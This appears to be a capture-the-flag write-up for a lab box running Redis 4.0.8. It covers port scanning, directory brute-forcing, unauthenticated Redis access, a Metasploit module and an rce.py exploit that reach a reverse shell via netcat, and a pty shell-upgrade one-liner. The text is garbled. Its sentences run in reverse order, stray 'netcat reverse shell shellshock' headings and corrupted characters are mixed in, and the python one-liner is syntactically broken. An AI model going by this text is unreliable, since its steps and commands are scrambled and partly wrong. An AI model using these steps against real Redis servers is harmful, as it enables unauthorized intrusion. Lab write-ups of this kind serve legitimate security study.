All of the write-ups for the box typically rely on a tool called pspy64 to analyze running processes and that is used to find the privilege escalation path. Python3 -c ‘import pty pty.spawn(“/bin/bash”)’ Now we have our lower privileged user Redis. I was able to get a reverse shell using python3. Remember to setup another netcat listener on your favorite port before executing the reverse shell command. Here you can see I tried a simple bash reverse shell on two different ports before I went on to the python reverse shell. That tells Redis that we want to issue commands on the local system. Here we will attempt to execute a reverse shell using the system.exec command. python3 rce.py -r 172.31.1.9 -L 10.10.0.14 -f module.soīefore we continue with the Redis RCE let’s switch over to another terminal window and again use Netcat to connect to the Redis service. With the module.so file created we are ready to launch the exploit. Navigate to the directory and in terminal use the Make command to build the module.so file. RedisModules-ExecuteCommand – Quick startĬlone the Github repository to your local machine. I did a search for “ redis execute module” and found one located on Github. However we will need a module file which is not provided by this exploit. We need the basics of course: RHOST, RPORT, LHOST, LPORT. Run the rce.py script and see what parameters are required. The second search result is exactly what I wanted. Let’s do a google search for “ redis rce” and see what’s available.
#Netcat reverse shell shellshock code#
Now we need to get a working exploit that will allow us remote code execution. Since we can run the info command and return results that means we have unauthenticated access to Redis. You’ll want to add the -v flag for verbose. To begin let’s connect to the Redis port 6379 using Netcat. On the second attempt I did establish a meterpreter session. I think it took me two tries and the first time I didn’t have a parameter set correctly. use exploit/linux/redis/redis_unauth_exec We’ll use the 4th exploit since we don’t have credentials yet and its an unauthenticated exploit.Ĭonfigure the following parameters and run the exploit. Let’s see if we can get a shell using this exploit. Since we found a Metasploit module for Redis.
#Netcat reverse shell shellshock how to#
If you’d further information on Redis and how to exploit it there’s a great presentation available from ZeroNights.Ī quick and dirty Searchsploit reveals we a couple options for exploits including one Metasploit module. So it works along with the webserver on port 80. It’s used as a database for a webserver and message broker among other things. I wasn’t familiar with Redis prior to this box, so I did google search and found Redis stands for Remote Dictionary Server. That leaves us with port 6379 and the service Redis. There are exploits for SSH, but in my experience SSH is used primarily in the post-exploitation phase either for privilege escalation or establishing a better shell once you’ve obtained credentials. I’ve mentioned this before but SSH on port 22 in terms of penetration testing is rarely the initial entry point for a box. However we don’t find anything else useful. Here again we confirm the hidden directories we found with Gobuster. When I encounter a webserver or a HTTP port I always can it with Nikto. Only a couple of directories and nothing that looks particularly interesting.
gobuster dir –wordlist /usr/share/wordlists/dirb/big.txt –url 172.31.1.9ĭidn’t find very much using Gobuster. I’ll use Gobuster to find any hidden directories that might be lurking behind port 80. SSH on 22, a web server on 80, and a uncommon port of 6379 which is hosting Redis 4.0.8. Get in the habit of scanning all TCP ports, as with Red if you only scan the top 1000 ports you will miss port 6379.
As per usual we start with a Nmap scan of the target.